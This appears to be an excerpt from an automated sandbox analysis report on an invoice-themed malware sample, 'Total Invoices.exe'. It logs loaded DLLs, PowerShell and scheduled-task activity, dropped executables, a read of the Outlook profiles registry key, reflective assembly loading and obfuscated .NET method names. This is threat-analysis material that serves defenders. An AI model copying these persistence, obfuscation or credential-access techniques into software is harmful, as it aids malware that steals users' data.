Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Total Invoices.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Total Invoices.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: Total Invoices.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Total Invoices.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Total Invoices.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
Source: Binary string: aDox.pdbSHA256 source: Total Invoices.exe, dWXyZYb.exe.0.dr
Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
Source: Binary string: aDox.pdb source: Total Invoices.exe, dWXyZYb.exe.0.dr

                      Data Obfuscation

Source: Total Invoices.exe, MainForm.cs | .Net Code: InitializeComponent
Source: dWXyZYb.exe.0.dr, MainForm.cs | .Net Code: InitializeComponent
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.cs | .Net Code: UwuCAxNgU3 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Total Invoices.exe.31a42d0.5.raw.unpack, HomeView.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.cs | .Net Code: UwuCAxNgU3 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Total Invoices.exe.59b0000.13.raw.unpack, HomeView.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07AD3EB2 push esp; iretd 0_2_07AD3EB9
Source: C:\Users\user\Desktop\Total Invoices.exe | Code function: 0_2_07AD0849 push esp; iretd 0_2_07AD0851
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F544 push es; iretd 8_2_0646F548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F549 push es; iretd 8_2_0646F554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F555 push es; iretd 8_2_0646F55C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F56D push es; iretd 8_2_0646F570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F571 push es; iretd 8_2_0646F57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F57D push es; iretd 8_2_0646F588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F510 push es; iretd 8_2_0646F51C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F51D push es; iretd 8_2_0646F520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F521 push es; iretd 8_2_0646F524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F5CD push es; iretd 8_2_0646F5DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F5C9 push es; iretd 8_2_0646F5CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F5DD push es; iretd 8_2_0646F5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0646F595 push es; iretd 8_2_0646F5C8
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Code function: 9_2_09903EB2 push esp; iretd 9_2_09903EB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_05D4A0DD push es; retf 13_2_05D4A0DE
Source: Total Invoices.exe | Static PE information: section name: .text entropy: 7.983017215615163
Source: dWXyZYb.exe.0.dr | Static PE information: section name: .text entropy: 7.983017215615163
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, buAHWK3lB2t9VXVM8a.cs | High entropy of concatenated method names: 'M7v9rIOBui', 'lFK92g2mNb', 'lmTNhUqn59', 'TNkNdTGnxJ', 'ecX9tfhaQi', 'mtX9imhk7c', 'R4d93bHOKE', 'G2j9pN2gMY', 'VxQ9oFt8AL', 'Co29bFpJcw'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, raMx1YCmhbZF0jKmTA.cs | High entropy of concatenated method names: 'MgRgpyYNU7', 'Af3go4IlrL', 'FlvgbaUQ69', 'FS8g00PiSN', 'YW8gDfYJSM', 'pqOg7Dfyew', 'bhYgnkNLRq', 'JI3grkSelA', 'QROgWIsnPY', 'SZ3g2iHVcT'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, uwjLjYEyXrAYNZsh8f.cs | High entropy of concatenated method names: 'mSVkBtJlgj', 'BjIkiNTJjc', 'CZLkpObvYC', 'IBOkoxa6ak', 'T48klhrjqP', 'p2skI5L8FS', 'BBAkqiRaSC', 'jn7kjN4DC0', 'U4JkGAKust', 'Uluk6ebfef'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, Pb2iVjKMTdGXDxXKxm.cs | High entropy of concatenated method names: 'Dispose', 'VAQdWmLlpI', 'puhxldbYkR', 'lF2HHTUbR0', 'T41d21lUxI', 'jtndzVfGfp', 'ProcessDialogKey', 'KCUxhRwdri', 'vIpxdgyOYM', 'mJ1xxySsgK'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, w24Fba77wypiBybTx6.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Y7xxWNnhU2', 'rVOx2gSS9O', 'zjsxzGwrIr', 'HPHZhahMsx', 'wlyZdQQLx8', 'TBrZxgjn14', 'Uw2ZZ5ZjRG', 'l15m3gauKD06BcFSADQ'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, WWfXRVyciXHPleu4LT.cs | High entropy of concatenated method names: 'HEcdS71BHu', 'NbFdOOdnxQ', 'BtXdfsaA1K', 'a86dXj5LQ0', 'tPAdkvnMHr', 'mqedQstM75', 'eAWSZ2bAKSc6ChfxcQ', 'NrU5OJLqQ9OTSTmZTU', 'MAbddkhXK9', 'TqbdZsW84v'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, OpxKWOkgLHaB0xbjWH.cs | High entropy of concatenated method names: 'IOJS5S4qf2', 'wE2SPeU6eX', 'hU5S8MA3ND', 'q9B82vNj1W', 'XAQ8zvg5At', 'JJoShS4oWO', 'e2wSdnTYTT', 'ootSx5mvAC', 'BhKSZBhwv0', 'AgISCQhA6A'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, iJbdw4ZlwaYgFWE45o.cs | High entropy of concatenated method names: 'm84AVgcw2', 'MlamVMrts', 'sbXLEGIYi', 'bEIvEAS0A', 'wjDsvUr0t', 'KaMU0Y96D', 'LoEtXHZDuJwoV8Bl1d', 'nBNxg6k5w4C8TWDIcT', 'xmbNnVcAQ', 'd6kRQuIgJ'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.cs | High entropy of concatenated method names: 'gZEZFIpGDb', 'Om8Z5hq7WG', 'hciZghsqvo', 'znvZPKgH84', 'vVAZuShmAg', 'Ea9Z8nUtff', 'NTZZSeBUrj', 'WU5ZOJWxH2', 'hIEZYHjvkK', 'MNyZfKqSuC'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, roV4m4FiW8Iqy5m7IY.cs | High entropy of concatenated method names: 'bpKuJcqcFH', 'DnMuvu7QAe', 'CYOPINElN7', 'QH5PqYOr6P', 'pdIPjHhqee', 'kIMPGuScZD', 'f8rP65rkKL', 'gSQPwvwUVj', 'py0PVld1ig', 'OMHPBeNc1i'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, R1jScK2BX0NZW28vGm.cs | High entropy of concatenated method names: 'NkFPmJDBQp', 'jv6PLRoqpi', 'PMJPTP5Ioa', 'eICPsQlXbR', 'sDpPkKV3vo', 'Gc8PQvXMw6', 'gcbP9PsSA8', 'JraPNVLD6W', 'YJZPayFLfE', 'JuwPRH7KnT'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, bV0kqGNJKV9MCk2FwgH.cs | High entropy of concatenated method names: 'TZlaM17yXp', 'gguaKZQQol', 'QQjaAmu5Oq', 'D3RamF9uRK', 'zc0aJJNUXR', 'qSaaLUhuBJ', 'vVhavH9XCI', 'ns8aToED4Z', 'Aw9asqoP9t', 'gWwaUfxQCg'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, d5mxGlNuelYhX2W4yxP.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LG1Rpp2LRw', 'mtWRoSpr0V', 'dgrRbGBTS7', 'd6dR02ay5W', 'aqlRD33AB3', 'TmSR7xFhHb', 'AUpRnADZmZ'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, Fop1vsIro4KLWDA10i.cs | High entropy of concatenated method names: 'lwv8FYNQT6', 'aqQ8gDd4Nc', 'U5S8uuIG0v', 'Rbm8SEoNCC', 'C9u8OkYqtx', 'ToduDfHpr5', 'FfFu7k1UVM', 'nlSun4XwEe', 'yGfurdiNiJ', 'SIBuWpPIli'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, i1S4jZmGiGcHh2VLvV.cs | High entropy of concatenated method names: 'soP1TjA4B8', 'TQb1s6T2vS', 'EoE1E7YEmZ', 'zEi1lBltBt', 'CLR1qiHOn2', 's3S1jShCTG', 'Jic16jD40V', 'Ahx1wRLGim', 'bCg1BU9Adm', 'RKB1t1vhT0'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, CrXs7oYO2FVLxbtdIy.cs | High entropy of concatenated method names: 'IUhN5KRB8v', 'PC8NgYWY3C', 'iBnNPn9Qmi', 'I3cNu6NGDa', 'tIPN8YZf7s', 'mNLNSDSLje', 'VkYNOZPx2H', 'VZxNY7nPy0', 'FmYNf6ya8p', 'WJuNXd0b6K'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, InnAJ7csc1jKjsF8ad.cs | High entropy of concatenated method names: 'SH7SMEuPvn', 'XDgSKJ7YLu', 'n76SA7bcmP', 'jACSmyVur5', 'wqLSJCDkBX', 'ShoSLbm3v2', 'f27SvPFRM7', 'AtpSTHrWOq', 'eL4SshApin', 'PRDSUjErTx'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, g3NmbNlXaSiobDsXBy.cs | High entropy of concatenated method names: 'GxMadr4R6C', 'S5taZRw6s1', 'u5FaC2sav9', 'WELa5d8C6d', 'ewDagFbV2G', 'Xa2auscu6p', 'apMa8P8ljG', 'CLyNnjH4p9', 'Aa7NrlRkeo', 'BZ1NWhIpKe'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, iVR7yJzOnBXclf4yqE.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aa5a1URC9g', 'VcuakA9KiD', 'qBWaQs53Wf', 'SPra9cavTQ', 'TD4aNNjL1E', 'AWcaaSdAi7', 'jlgaRmemiy'
Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, rKLqexOag3LmFqHckP.cs | High entropy of concatenated method names: 'ybgNEN8MS5', 'MKlNlNZSCS', 'WbNNIsdf5u', 'tWRNqDhfno', 'pwGNpEyikQ', 'Qv1NjrKZKi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, buAHWK3lB2t9VXVM8a.cs | High entropy of concatenated method names: 'M7v9rIOBui', 'lFK92g2mNb', 'lmTNhUqn59', 'TNkNdTGnxJ', 'ecX9tfhaQi', 'mtX9imhk7c', 'R4d93bHOKE', 'G2j9pN2gMY', 'VxQ9oFt8AL', 'Co29bFpJcw'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, raMx1YCmhbZF0jKmTA.cs | High entropy of concatenated method names: 'MgRgpyYNU7', 'Af3go4IlrL', 'FlvgbaUQ69', 'FS8g00PiSN', 'YW8gDfYJSM', 'pqOg7Dfyew', 'bhYgnkNLRq', 'JI3grkSelA', 'QROgWIsnPY', 'SZ3g2iHVcT'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, uwjLjYEyXrAYNZsh8f.cs | High entropy of concatenated method names: 'mSVkBtJlgj', 'BjIkiNTJjc', 'CZLkpObvYC', 'IBOkoxa6ak', 'T48klhrjqP', 'p2skI5L8FS', 'BBAkqiRaSC', 'jn7kjN4DC0', 'U4JkGAKust', 'Uluk6ebfef'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, Pb2iVjKMTdGXDxXKxm.cs | High entropy of concatenated method names: 'Dispose', 'VAQdWmLlpI', 'puhxldbYkR', 'lF2HHTUbR0', 'T41d21lUxI', 'jtndzVfGfp', 'ProcessDialogKey', 'KCUxhRwdri', 'vIpxdgyOYM', 'mJ1xxySsgK'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, w24Fba77wypiBybTx6.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Y7xxWNnhU2', 'rVOx2gSS9O', 'zjsxzGwrIr', 'HPHZhahMsx', 'wlyZdQQLx8', 'TBrZxgjn14', 'Uw2ZZ5ZjRG', 'l15m3gauKD06BcFSADQ'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, WWfXRVyciXHPleu4LT.cs | High entropy of concatenated method names: 'HEcdS71BHu', 'NbFdOOdnxQ', 'BtXdfsaA1K', 'a86dXj5LQ0', 'tPAdkvnMHr', 'mqedQstM75', 'eAWSZ2bAKSc6ChfxcQ', 'NrU5OJLqQ9OTSTmZTU', 'MAbddkhXK9', 'TqbdZsW84v'
Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, OpxKWOkgLHaB0xbjWH.cs | High entropy of concatenated method names: 'IOJS5S4qf2', 'wE2SPeU6eX', 'hU5S8MA3ND', 'q9B82vNj1W', 'XAQ8zvg5At', 'JJoShS4oWO', 'e2wSdnTYTT', 'ootSx5mvAC', 'BhKSZBhwv0', 'AgISCQhA6A'
